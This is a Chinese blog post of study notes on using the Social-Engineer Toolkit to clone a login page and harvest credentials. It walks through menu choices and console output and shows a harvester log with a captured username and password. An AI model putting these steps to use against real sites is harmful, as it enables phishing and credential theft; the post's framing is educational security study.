cstriker1407的笔记本

好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:setoolkit克隆网站

已发表 通过 cstriker1407 2014年6月1日 0 评论

阅读下个 →

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

setoolkit是一个非常有用的社会工程学工具,里面有很多工具,这里作者只笔记下其最简单的使用方法。

CONTENTS

setoolkit克隆网站的基本流程:

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
。。。。。。。。
set> 1 #选择1

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
。。。。。。。。

set> 2 #选择2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
。。。。。。。。

set:webattack>3 #选择3

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2 #选择2 这里我们克隆一个,也可以选择已有的模板或者手动导入
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.test.com/login.php #输入要克隆的网址

[*] Cloning the website: http://www.test.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]: y #作者在set_config中设置了APACHE为ON,同时保持APACHE的目录为 /var/www
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
. ok 
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue} #敲回车开始
。。。。。

当有用户进入了这个克隆的网站,并且输入数据后,我们就可以看到后台的日志了: 

root@kali:/var/www# pwd
/var/www
root@kali:/var/www# ls
harvester_2014-06-01 18:12:39.762872.txt  index.html  post.php
root@kali:/var/www# cat harvester_2014-06-01\ 18\:12\:39.762872.txt 
Array
(
    [log] => test
    [pwd] => 1234
    [wp-submit] => 登录
    [redirect_to] => http://www.test.com/login.php
    [testcookie] => 1
)

注意事项:

作者不是web开发出身,对于web开发不是太熟悉,简单的看了下 index.html 和 post.php 这两个文件,感觉使用这种方式克隆网站局限性还是很大的,必须是采用 post 方式提交才可以,不知道对不对,如果有大神路过,还请指点一二。

cstriker1407

阅读下个 →

发表评论

2 + 9 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

2024年 4月
1234567
891011121314
15161718192021
22232425262728
2930  

Contents